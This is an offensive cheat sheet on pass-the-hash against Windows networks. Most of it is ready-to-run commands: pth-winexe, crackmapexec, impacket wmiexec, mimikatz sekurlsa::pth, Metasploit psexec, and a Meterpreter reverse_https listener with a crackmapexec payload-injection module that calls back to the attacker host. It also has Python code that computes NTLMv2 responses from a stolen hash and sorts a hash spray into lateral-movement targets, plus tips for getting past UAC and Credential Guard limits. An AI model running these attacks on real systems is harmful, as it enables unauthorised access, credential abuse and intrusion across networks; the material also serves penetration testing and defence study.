PTH: Pass the hash
Requirement:
SMB access over ports 139/445 with administrative rights on the target. The psexec-style methods (pth-winexe, smbexec, Metasploit psexec) write to a share such as ADMIN$ or C$ and create a service; wmiexec only needs DCOM (135) plus SMB for command output. The hash is supplied as LM:NT; since modern hosts store no LM hash, the LM half is the empty-password value aad3b435b51404eeaad3b435b51404ee.
Contents
Linux
SMB
root #
pth-winexe -U $DOMAIN/administrator%$LMHASH:$NTHASH //$IP cmd
root #
crackmapexec smb $IP -u Administrator -H $HASH --exec-method smbexec -x whoami
root #
python wmiexec.py -hashes :$HASH administrator@$HOST
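Why the hash alone is enough, as an added illustration (this code is not from the page or from any of the tools above): the NT hash is MD4 of the UTF-16LE password, and every NTLMv2 exchange the client performs is keyed with that hash, never with the password. The block below builds the NT hash, formats it as the LM:NT string pth-winexe and impacket's -hashes take, and computes an NTLMv2 response twice, once from the password and once from a "stolen" hash, to show they are identical. The user, domain, challenge and client blob are constructed values, and the MD4 is a pure-Python one because hashlib's md4 is absent on OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

# LM hash of an empty password. Modern hosts never store LM, so this constant
# fills the LM field of the LM:NT strings that pth-winexe and impacket accept.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is missing on OpenSSL 3 builds."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian

    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a, b, c, d = d, rol((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rol((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF, (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is the <NT HASH> the tools above take."""
    return md4(password.encode("utf-16-le"))


def pth_credential(nt: bytes) -> str:
    """Format a dumped NT hash as the LM:NT string pth-winexe / impacket -hashes expect."""
    return f"{EMPTY_LM}:{nt.hex()}"


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key (MS-NLMP NTOWFv2): HMAC-MD5 keyed with the NT hash. No password involved."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 response = NTProofStr || blob. Everything the client needs is derived from
    the NT hash, which is why replaying the hash is as good as knowing the password."""
    nt_proof = hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob


def demo():
    # Constructed values for the walk-through; not captured traffic.
    user, domain = "Administrator", "CORP"
    legit = nt_hash("password")                                  # what the victim's SAM/LSASS holds
    stolen = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # what an attacker dumped
    challenge = bytes.fromhex("0123456789abcdef")               # 8-byte server challenge
    blob = b"\x01\x01" + b"\x00" * 22                            # stand-in for NTLMv2_CLIENT_CHALLENGE
    same = ntlmv2_response(legit, user, domain, challenge, blob) == \
        ntlmv2_response(stolen, user, domain, challenge, blob)
    return pth_credential(stolen), same


if __name__ == "__main__":
    cred, same = demo()
    print("pass as:", cred)
    print("response from hash == response from password:", same)
```

The same holds for NTLMv1 and for the NTLMSSP session key, so signing and sealing are also available to whoever holds the hash; this is why SMB signing does not stop pass-the-hash (it stops relay, where the attacker has no key).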
MS SQL
root #
export SMBHASH=$LMHASH:$NTHASH
root #
pth-sqsh -D$DATABASE_NAME -S$IP -U"$DOMAIN\\$USERNAME" -mpretty
The pth-sqsh build reads the hash from the SMBHASH environment variable (LM:NT) rather than from -P. For a local SQL login via Windows auth, use the host name in place of the domain.
RDP
root #
xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389
Only works if the target has Restricted Admin mode enabled (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0); it is off by default, so a failure here usually means the mode, not the hash.
Metasploit
msf>
use exploit/windows/smb/psexec
Set RHOSTS and SMBUser as usual and put the hash in SMBPass in LM:NT form (aad3b435b51404eeaad3b435b51404ee:$NTHASH); the module accepts a hash wherever it accepts a password.
Crackmapexec + Meterpreter
First, start meterpreter listener:
msf>
use exploit/multi/handler
msf>
set payload windows/meterpreter/reverse_https
msf>
set LHOST $LOCALIP
msf>
set ExitOnSession false
msf>
set LPORT 444
msf>
exploit -j
root #
crackmapexec smb $IP -u administrator -H $HASH -M metinject -o LHOST=$LOCALIP LPORT=444
Crackmapexec + Empire
root #
python empire --rest --user empireadmin --pass Password123!
Edit ~/.cme/cme.conf:
[Empire]
api_host=127.0.0.1
api_port=1337
username=empireadmin
password=Password123!

[Metasploit]
rpc_host=127.0.0.1
rpc_port=55552
password=abc123
root #
crackmapexec smb $IP/24 -u $USER -H $HASH -M empire_exec -o LISTENER=test
Windows
On Windows use mimikatz, or impacket's wmiexec.
PTH with mimikatz:
C:>
mimikatz.exe
mimikatz# privilege::debug
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH /run:cmd.exe
This opens a cmd.exe on the machine you are running mimikatz on, not on the target: the new process carries a logon session whose NTLM credential is the injected hash, so anything it does over the network (dir \\$TARGET\C$, PsExec, WMI) authenticates as that user. sekurlsa::pth needs local admin plus SeDebugPrivilege (hence privilege::debug) because it patches LSASS memory.
Check hashes against network
root #
medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
root #
crackmapexec smb $IP/24 -u Administrator -H $HASH
Add --local-auth when the account is a local one rather than a domain account; otherwise CME authenticates against the domain and the hash is rejected.
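Triage of a spray's output, as an added example (not from the page or from crackmapexec itself): after checking one hash against a /24 you want three lists, hosts where the hash gave admin, hosts where it authenticated but came back without (Pwn3d!), and hosts where it failed outright with a status code. The second list matters on a pass-the-hash page because with a local account it is usually the UAC remote restriction below (LocalAccountTokenFilterPolicy unset), not a wrong hash. The regexes are modelled on crackmapexec's SMB lines but the exact column layout is an assumption, and the sample output is constructed, not a real capture.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Line shapes are modelled on crackmapexec's SMB output; treat the exact column
# spacing as an assumption and adjust the patterns if your version differs.
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+445\s+(?P<host>\S+)\s+\[\*\].*?\(signing:(?P<signing>True|False)\)"
)
AUTH_RE = re.compile(
    r"^SMB\s+(?P<ip>\S+)\s+445\s+(?P<host>\S+)\s+\[(?P<mark>[+-])\]\s+(?P<cred>\S+)(?P<rest>.*)$"
)


@dataclass
class HostResult:
    ip: str
    host: str
    signing: Optional[bool] = None  # SMB signing required on the target?
    auth_ok: bool = False           # hash accepted at all
    admin: bool = False             # CME printed (Pwn3d!) => ADMIN$ writable
    status: str = "untested"


def triage(lines: List[str]) -> Dict[str, HostResult]:
    """Fold CME spray output into one record per host."""
    results: Dict[str, HostResult] = {}
    for line in lines:
        m = BANNER_RE.match(line)
        if m:
            r = results.setdefault(m["ip"], HostResult(m["ip"], m["host"]))
            r.signing = m["signing"] == "True"
            continue
        m = AUTH_RE.match(line)
        if not m:
            continue
        r = results.setdefault(m["ip"], HostResult(m["ip"], m["host"]))
        rest = m["rest"]
        if m["mark"] == "+":
            r.auth_ok = True
            r.admin = "(Pwn3d!)" in rest
            r.status = "admin" if r.admin else "user"
        else:
            r.auth_ok = False
            found = re.search(r"STATUS_[A-Z_]+", rest)
            r.status = found.group(0) if found else "failed"
    return results


def lateral_targets(results: Dict[str, HostResult]) -> List[str]:
    """Hosts where the hash gave admin: candidates for psexec/wmiexec."""
    return sorted(ip for ip, r in results.items() if r.admin)


def filtered_token_suspects(results: Dict[str, HostResult]) -> List[str]:
    """Hash accepted but no admin. With a local account this is usually the UAC
    remote restriction (LocalAccountTokenFilterPolicy unset), not a bad hash."""
    return sorted(ip for ip, r in results.items() if r.auth_ok and not r.admin)


# Constructed sample output (not a real capture) for a spray of one NT hash.
SAMPLE = """
SMB         10.0.0.5        445    DC01             [*] Windows Server 2019 Standard 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    WS07             [*] Windows 10 Pro 19041 x64 (name:WS07) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.9        445    WS09             [*] Windows 10 Pro 19041 x64 (name:WS09) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.0.5        445    DC01             [-] corp.local\\Administrator:8846f7eaee8fb117ad06bdd830b7586c STATUS_LOGON_FAILURE
SMB         10.0.0.7        445    WS07             [+] WS07\\Administrator:8846f7eaee8fb117ad06bdd830b7586c (Pwn3d!)
SMB         10.0.0.9        445    WS09             [+] WS09\\helpdesk:8846f7eaee8fb117ad06bdd830b7586c
""".strip().splitlines()


if __name__ == "__main__":
    res = triage(SAMPLE)
    for r in res.values():
        print(f"{r.ip:<12} {r.host:<6} signing={r.signing} status={r.status}")
    print("admin on:", lateral_targets(res))
    print("auth ok but filtered token:", filtered_token_suspects(res))
```

Pipe the real run through it with `crackmapexec smb ... | tee spray.log` and `triage(open("spray.log").read().splitlines())`; the signing flag is kept because it decides whether relay is an option on the hosts where the hash did not work.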
2018 update
Problems with / defence systems
Registry settings to check when a valid hash still returns STATUS_ACCESS_DENIED or only a non-admin session:
UAC remote restrictions: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy" = 1 disables the filtering described below; absent or 0 (the default) keeps it on.
SMB signing: "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 1 means signing is required. Required signing stops NTLM relay, not pass-the-hash: whoever holds the NT hash can derive the session key and sign, so an access-denied result is more likely the UAC filter or a non-admin account than signing.
WDigest: "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential" = 1 makes LSASS keep cleartext passwords. This decides what you can harvest from a host you already control; it has no effect on whether a target accepts a hash.
Passing the hash does not work in all cases. Credential Guard (a virtualization-based security feature, not Windows Defender antivirus, despite the "Windows Defender Credential Guard" name) moves the NT hashes into the isolated LSAIso process. On such a host you can neither dump hashes from LSASS nor use mimikatz sekurlsa::pth, which works by patching the hash into LSASS memory; that includes the built-in Administrator's hash. It does not stop a target from accepting a hash obtained elsewhere, and turning off Defender antivirus does nothing to it: it is enabled by group policy and can be UEFI-locked so that it cannot be disabled from the running system.
Additionally, you might have to edit the Registry. Windows operating systems starting with Vista apply UAC remote restrictions: local accounts in the Administrators group only receive a filtered, non-admin token when they authenticate over the network, so the hash is accepted but ADMIN$ and service creation fail. The built-in RID-500 Administrator is exempt (unless FilterAdministratorToken is set), and domain accounts are not affected. To pass the hash of another local admin, disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and creating a DWORD entry named LocalAccountTokenFilterPolicy with a value of 1.